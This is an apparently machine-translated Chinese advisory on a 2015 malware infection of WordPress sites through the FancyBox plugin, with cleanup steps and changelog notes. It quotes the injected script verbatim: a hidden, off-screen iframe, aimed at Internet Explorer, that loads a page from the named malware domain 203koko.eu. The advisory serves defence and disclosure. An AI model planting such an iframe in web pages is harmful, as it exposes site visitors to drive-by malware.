本週早些時候一些網站和博客 WordPress,收到來自的警告 惡意軟件感染 通過 谷歌的管理者.
問題向其中 谷歌的管理者 稱為是一個存在 鱈魚 / 腳本 iframe惡意軟件 來源網站。
<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>
看來,這是一個 漏洞 a 插入acquis FancyBox 為 WordPress 它直到昨天(05.02.2015)尚未更新,很長一段時間。
解決這個問題,並 消毒病毒網站 有了這個惡意軟件,相對簡單。
1.禁用FancyBox插件。
2。 從服務器上刪除所有的FancyBox插件文件(通過FTP)
3.安裝新版本的插件(的fancybox 3.0.4)
FancyBox 為 WordPress 3.0.4
- 重命名受 3.0.3 中提到的安全問題影響的設置。 這應該可以阻止惡意代碼出現在插件所在的網站上 updated 不刪除惡意代碼。
FancyBox 為 WordPress 3.0.3
- 修正了一個安全問題.
惡意軟件信息:
TYPE:Iframe的重定向
TARGET: WordPress 花式盒子
惡意軟件DOMAIN:203koko.eu
惡意軟件網址:http://203koko.eu/hjnfh/ipframe2.php
惡意軟件 RAW 代碼:
惡意軟件寫道: if (navigator.userAgent.match(/msie/i)) { document.write(‘
刪除您的惡意軟件 WordPress 網站.